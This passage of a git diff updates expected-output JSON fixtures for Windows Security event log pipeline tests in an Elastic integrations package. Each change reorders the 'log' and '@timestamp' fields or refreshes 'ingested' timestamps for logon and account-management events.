@@ -748,13 +749,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:10:55.458Z", "ecs": { "version": "1.12.0" }, @@ -763,11 +757,17 @@ "vagrant" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021232300Z", + "ingested": "2021-12-14T14:55:46.477099975Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -867,7 +867,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021237Z", + "ingested": "2021-12-14T14:55:46.477100384Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -899,6 +899,7 @@ "pid": 2812, "executable": "C:\\Windows\\System32\\winlogon.exe" }, + "@timestamp": "2019-03-29T21:13:17.521Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -945,13 +946,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:13:17.521Z", "ecs": { "version": "1.12.0" }, 
@@ -961,11 +955,17 @@ "VAGRANT-2012-R2$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021241700Z", + "ingested": "2021-12-14T14:55:46.477100799Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1069,7 +1069,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021256600Z", + "ingested": "2021-12-14T14:55:46.477101201Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1101,6 +1101,7 @@ "pid": 2188, "executable": "C:\\Windows\\System32\\winlogon.exe" }, + "@timestamp": "2019-03-29T21:13:18.786Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -1147,13 +1148,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:13:18.786Z", "ecs": { "version": "1.12.0" }, @@ -1163,11 +1157,17 @@ "VAGRANT-2012-R2$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021263700Z", + "ingested": "2021-12-14T14:55:46.477101810Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1199,6 +1199,7 @@ "pid": 508, "executable": "C:\\Windows\\System32\\services.exe" }, + "@timestamp": "2019-03-29T21:20:48.740Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { 
@@ -1245,13 +1246,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:20:48.740Z", "ecs": { "version": "1.12.0" }, @@ -1261,11 +1255,17 @@ "VAGRANT-2012-R2$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021268500Z", + "ingested": "2021-12-14T14:55:46.477102243Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1297,6 +1297,7 @@ "pid": 508, "executable": "C:\\Windows\\System32\\services.exe" }, + "@timestamp": "2019-03-29T21:20:48.740Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -1343,13 +1344,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:20:48.740Z", "ecs": { "version": "1.12.0" }, @@ -1359,11 +1353,17 @@ "VAGRANT-2012-R2$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021273500Z", + "ingested": "2021-12-14T14:55:46.477102652Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", 
@@ -1395,6 +1395,7 @@ "pid": 508, "executable": "C:\\Windows\\System32\\services.exe" }, + "@timestamp": "2019-03-29T21:20:50.584Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -1441,13 +1442,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:20:50.584Z", "ecs": { "version": "1.12.0" }, @@ -1457,11 +1451,17 @@ "VAGRANT-2012-R2$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021278700Z", + "ingested": "2021-12-14T14:55:46.477103058Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1493,6 +1493,7 @@ "pid": 508, "executable": "C:\\Windows\\System32\\services.exe" }, + "@timestamp": "2019-03-29T21:23:42.520Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -1539,13 +1540,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:23:42.520Z", "ecs": { "version": "1.12.0" }, 
@@ -1555,11 +1549,17 @@ "VAGRANT-2012-R2$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021284800Z", + "ingested": "2021-12-14T14:55:46.477103461Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1591,6 +1591,7 @@ "pid": 508, "executable": "C:\\Windows\\System32\\services.exe" }, + "@timestamp": "2019-03-29T21:26:24.176Z", "winlog": { "computer_name": "vagrant-2012-r2", "process": { @@ -1637,13 +1638,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" - } - }, - "@timestamp": "2019-03-29T21:26:24.176Z", "ecs": { "version": "1.12.0" }, @@ -1653,11 +1647,17 @@ "VAGRANT-2012-R2$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2012r2-logon.xml" + } + }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021288700Z", + "ingested": "2021-12-14T14:55:46.477103997Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1764,7 +1764,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-12-09T13:45:53.021294600Z", + "ingested": "2021-12-14T14:55:46.477104427Z", "code": "4625", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", 
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json index c123e615d29..9983e9ae94d 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:45:56.799158900Z", + "ingested": "2021-12-14T14:55:50.103940746Z", "code": "4722", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -149,7 +149,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:45:56.799168200Z", + "ingested": "2021-12-14T14:55:50.103943474Z", "code": "4722", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json index 164fe82a6de..6927aa90671 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:45:57.198644900Z", + "ingested": "2021-12-14T14:55:50.522046350Z", "code": "4723", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", 
@@ -149,7 +149,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:45:57.198653Z", + "ingested": "2021-12-14T14:55:50.522048836Z", "code": "4723", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json index b7f1cf2b80f..1043c4538f6 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:45:57.605360600Z", + "ingested": "2021-12-14T14:55:50.951897010Z", "code": "4724", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -149,7 +149,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:45:57.605370200Z", + "ingested": "2021-12-14T14:55:50.951899285Z", "code": "4724", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json index c26ffa0750d..efa3d79a15d 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json 
@@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:45:58.018706300Z", + "ingested": "2021-12-14T14:55:51.363550389Z", "code": "4725", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -149,7 +149,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:45:58.018715100Z", + "ingested": "2021-12-14T14:55:51.363553367Z", "code": "4725", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json index bdab733d2f2..93282368c48 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:45:58.420324500Z", + "ingested": "2021-12-14T14:55:51.780195367Z", "code": "4726", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -151,7 +151,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:45:58.420333100Z", + "ingested": "2021-12-14T14:55:51.780197953Z", "code": "4726", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json index 92adf9049a7..82436a55e5a 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json 
@@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:26:12.495Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4727.xml" - } - }, - "@timestamp": "2019-10-22T11:26:12.495Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "WIN-41OB2LO92CR$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4727.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:58.829765Z", + "ingested": "2021-12-14T14:55:52.195023295Z", "code": "4727", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json index 29d7429c1ef..2222f58bfe4 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:33:26.861Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4728.xml" - } - }, - "@timestamp": "2019-10-22T11:33:26.861Z", "ecs": { "version": "1.12.0" }, 
@@ -59,11 +53,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4728.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:59.028797700Z", + "ingested": "2021-12-14T14:55:52.396214182Z", "code": "4728", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json index 4e789547880..c54767672bb 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:33:45.543Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4729.xml" - } - }, - "@timestamp": "2019-10-22T11:33:45.543Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4729.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:59.290038500Z", + "ingested": "2021-12-14T14:55:52.655011957Z", "code": "4729", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", 
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json index 086659daf0f..1f0843e96ff 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:34:01.610Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -42,13 +43,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4730.xml" - } - }, - "@timestamp": "2019-10-22T11:34:01.610Z", "ecs": { "version": "1.12.0" }, @@ -57,11 +51,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4730.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:59.545413300Z", + "ingested": "2021-12-14T14:55:52.917929313Z", "code": "4730", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json index 285251fdbc5..9e8d57cafeb 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json 
@@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:29:49.358Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4731.xml" - } - }, - "@timestamp": "2019-10-22T11:29:49.358Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4731.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:59.740385600Z", + "ingested": "2021-12-14T14:55:53.119907336Z", "code": "4731", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json index afd3ede3ac9..cf716e2ff7b 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:31:58.039Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4732.xml" - } - }, - "@timestamp": "2019-10-22T11:31:58.039Z", "ecs": { "version": "1.12.0" }, 
@@ -59,11 +53,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4732.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:59.938327700Z", + "ingested": "2021-12-14T14:55:53.327527148Z", "code": "4732", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json index bd3c9c7ce45..d1625fb08b2 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:32:14.894Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4733.xml" - } - }, - "@timestamp": "2019-10-22T11:32:14.894Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4733.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:46:00.202622100Z", + "ingested": "2021-12-14T14:55:53.590899890Z", "code": "4733", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", 
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json index c17617e0863..b175319a602 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:32:35.127Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -42,13 +43,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4734.xml" - } - }, - "@timestamp": "2019-10-22T11:32:35.127Z", "ecs": { "version": "1.12.0" }, @@ -57,11 +51,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4734.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:46:00.463978200Z", + "ingested": "2021-12-14T14:55:53.854624754Z", "code": "4734", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json index dd81014c585..8a7a04a1e7f 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json 
@@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:32:30.425Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4735.xml" - } - }, - "@timestamp": "2019-10-22T11:32:30.425Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4735.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:46:00.656014200Z", + "ingested": "2021-12-14T14:55:54.050597983Z", "code": "4735", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json index a5a85ef7dbb..0b6a375b8fc 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:33:57.271Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4737.xml" - } - }, - "@timestamp": "2019-10-22T11:33:57.271Z", "ecs": { "version": "1.12.0" }, 
@@ -59,11 +53,17 @@ "Administrator" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4737.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:46:00.856335200Z", + "ingested": "2021-12-14T14:55:54.253800480Z", "code": "4737", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json index 009c5a333ee..415531dc4e4 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json @@ -88,7 +88,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:46:01.054603700Z", + "ingested": "2021-12-14T14:55:54.448206599Z", "code": "4738", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json index 95558c460f5..0a347a875b7 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json 
@@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:46:01.309395100Z", + "ingested": "2021-12-14T14:55:54.705483833Z", "code": "4740", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json index c03c1549d86..1b675794c6e 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-22T11:34:33.783Z", "winlog": { "computer_name": "WIN-41OB2LO92CR.wlbeat.local", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4754.xml" - } - }, - "@timestamp": "2019-10-22T11:34:33.783Z", "ecs": { "version": "1.12.0" }, @@ -59,11 